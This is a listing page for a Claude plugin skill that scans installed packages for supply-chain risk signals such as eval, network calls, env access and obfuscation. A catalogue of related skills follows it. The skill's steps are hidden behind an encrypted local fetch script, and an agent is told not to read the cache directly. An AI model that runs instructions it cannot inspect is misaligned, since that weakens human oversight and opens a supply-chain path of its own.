package-risk

Name: package-risk
Author: hrconsultnj/claude-plugins

$npx mdskill add hrconsultnj/claude-plugins/package-risk

Analyzes installed package source code for suspicious patterns like eval and network calls to assess supply chain risk.

Helps developers identify potential security threats in dependencies by scanning for risky behaviors.
Integrates with a fetch command for secure content loading, handling caching and decryption.
Scores packages based on detected patterns and provides file and line context for findings.
Presents results with a risk score and detailed reports of suspicious code locations.

SKILL.md

.github/skills/package-riskView on GitHub ↗

---
name: package-risk
description: Analyze an installed package's source code for suspicious behavior patterns (eval, network calls, env access, obfuscation).
argument-hint: "<package-name> [--ecosystem js|python|rust|go]"
---

Inspect an installed package's source code for behavioral signals that indicate supply chain risk. Scores the package and reports suspicious patterns with file:line context.

## Content Loading

Load each step through the fetch command (handles caching, decryption, and auth):

```bash
"~/.composure/bin/composure-fetch.mjs" skill sentinel package-risk {step-filename}
```

**Do NOT read cache files directly** — they are encrypted at rest. Always use the fetch command above.

## Steps

| # | File | 
|---|------|
| 1 | `01-locate-package.md` |
| 2 | `02-behavior-scan.md` |
| 3 | `03-score-and-report.md` |

More from hrconsultnj/claude-plugins

Skill	Description
app-architecture	Complete architecture guide for building features from database to UI. Routes to frontend/, fullstack/, mobile/, backend/, or sdks/ based on detected stack. Covers decomposition, multi-tenant isolation, auth model, query patterns, and component patterns.
audit-deps	Focused dependency CVE audit — reports vulnerabilities with version info and safe upgrade commands.
backlog	Manage the tasks-plans/ workspace — add items to backlog, ideas, or reference. Process queued work. Organize by topic, not flat dumps.
build-graph	Build or update the code review knowledge graph, generate the visualization, and open it. Run this first to initialize, or let hooks keep it updated automatically.
calibrate	Calibrate test bench — detect test framework, read existing test conventions, generate .claude/testbench.json config. Query Context7 for test framework reference docs. Run once per project.
ci-generate	Generate CI/CD workflow from detected stack. GitHub Actions, GitLab CI, or Bitbucket Pipelines. Includes lint, typecheck, test, build, and deploy stages.
ci-validate	Validate CI/CD workflow files. Runs actionlint for GitHub Actions, checks for common mistakes, and reports issues with fix suggestions.
code-organizer	Restructure a messy project into conventional file layout based on detected framework. Analyzes, plans, executes with import updates, and verifies.
deps-check	Check dependency health -- known CVEs, outdated packages, unsafe versions. Recommends the highest safe version, not just "latest". Blocks Critical CVEs via Composure commit gate.
design-forge	This skill should be used when the user asks to "add premium animations", "create a canvas visualization", "build a glassmorphism panel", "add a custom cursor", "create a generative background", "build an interactive card", "add scroll progress", "add sound design", "create a Three.js hero", "build a creative portfolio", "add particle effects", "add scanlines", "add a typewriter effect", "design a landing page", "implement advanced animations", "add 3D elements", "design using Next.js Conf patterns", "create interactive experience", "add Framer Motion animations", "add GSAP scroll animations", "integrate Spline 3D", or needs guidance on premium web design patterns, creative coding, generative art, micro-interactions, accessibility for animations, or bespoke interactive experiences beyond standard UI components.